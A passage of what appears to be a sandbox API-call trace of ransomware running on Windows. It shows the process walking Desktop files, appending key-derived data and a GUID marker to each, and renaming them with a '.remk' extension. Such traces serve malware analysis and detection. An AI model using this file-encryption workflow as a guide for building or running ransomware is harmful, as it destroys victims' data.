lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.619] CloseHandle (hObject=0x640) returned 1 [0231.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.622] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKwmzFKk1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukwmzfkk1.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKwmzFKk1.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukwmzfkk1.mp3.remk")) returned 1 [0231.625] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff5be970, ftCreationTime.dwHighDateTime=0x1d5ddf4, ftLastAccessTime.dwLowDateTime=0xddb43af0, ftLastAccessTime.dwHighDateTime=0x1d5e60c, ftLastWriteTime.dwLowDateTime=0xddb43af0, ftLastWriteTime.dwHighDateTime=0x1d5e60c, nFileSizeHigh=0x0, nFileSizeLow=0x13a8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w4-qqXV2ZOEYBvDS5I.avi", cAlternateFileName="W4-QQX~1.AVI")) returned 1 [0231.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.625] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w4-qqXV2ZOEYBvDS5I.avi") returned=".avi" [0231.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w4-qqXV2ZOEYBvDS5I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w4-qqxv2zoeybvds5i.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.625] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=80526) returned 1 [0231.625] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.628] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13a68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.628] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.629] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.629] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x13a8e, lpOverlapped=0x0) returned 1 [0231.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.630] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.632] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.632] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.632] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.632] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.632] GetLastError () returned 0x0 [0231.632] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.632] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.632] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.632] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.632] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.633] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.633] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x13a8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.634] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.634] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.634] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.634] CloseHandle (hObject=0x640) returned 1 [0231.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0231.636] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w4-qqXV2ZOEYBvDS5I.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w4-qqxv2zoeybvds5i.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\w4-qqXV2ZOEYBvDS5I.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w4-qqxv2zoeybvds5i.avi.remk")) returned 1 [0231.638] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wzVrnoY3pfgm5", cAlternateFileName="WZVRNO~1")) returned 1 [0231.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ce8 [0231.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3ec8 [0231.638] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc45eb0, ftCreationTime.dwHighDateTime=0x1d5e1d5, ftLastAccessTime.dwLowDateTime=0x990e5550, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x990e5550, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0x10cb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YArHu1.avi", cAlternateFileName="")) returned 1 [0231.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.638] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YArHu1.avi") returned=".avi" [0231.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YArHu1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yarhu1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.638] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=68789) returned 1 [0231.638] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.641] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10c8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.642] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.643] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10cb5, lpOverlapped=0x0) returned 1 [0231.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.643] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.645] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.645] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.645] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.645] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.645] GetLastError () returned 0x0 [0231.645] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.645] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.645] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.645] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.645] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.646] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.646] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10cb5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.646] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.647] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.647] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.647] CloseHandle (hObject=0x640) returned 1 [0231.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0231.651] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YArHu1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yarhu1.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YArHu1.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yarhu1.avi.remk")) returned 1 [0231.654] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd618aa00, ftCreationTime.dwHighDateTime=0x1d5e52c, ftLastAccessTime.dwLowDateTime=0xb8d15b70, ftLastAccessTime.dwHighDateTime=0x1d5e1eb, ftLastWriteTime.dwLowDateTime=0xb8d15b70, ftLastWriteTime.dwHighDateTime=0x1d5e1eb, nFileSizeHigh=0x0, nFileSizeLow=0xae64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zftDypyr-e.pps", cAlternateFileName="ZFTDYP~1.PPS")) returned 1 [0231.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.654] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zftDypyr-e.pps") returned=".pps" [0231.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zftDypyr-e.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zftdypyr-e.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.654] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=44644) returned 1 [0231.654] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.657] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xae3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.657] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.659] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.659] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xae64, lpOverlapped=0x0) returned 1 [0231.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.660] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.660] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.660] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.661] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.662] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.662] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.662] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.662] GetLastError () returned 0x0 [0231.662] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.662] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.662] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.662] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.662] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.662] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.662] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.663] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xae64, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.663] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.663] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.663] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.663] CloseHandle (hObject=0x640) returned 1 [0231.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.666] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zftDypyr-e.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zftdypyr-e.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zftDypyr-e.pps.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zftdypyr-e.pps.remk")) returned 1 [0231.668] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd618aa00, ftCreationTime.dwHighDateTime=0x1d5e52c, ftLastAccessTime.dwLowDateTime=0xb8d15b70, ftLastAccessTime.dwHighDateTime=0x1d5e1eb, 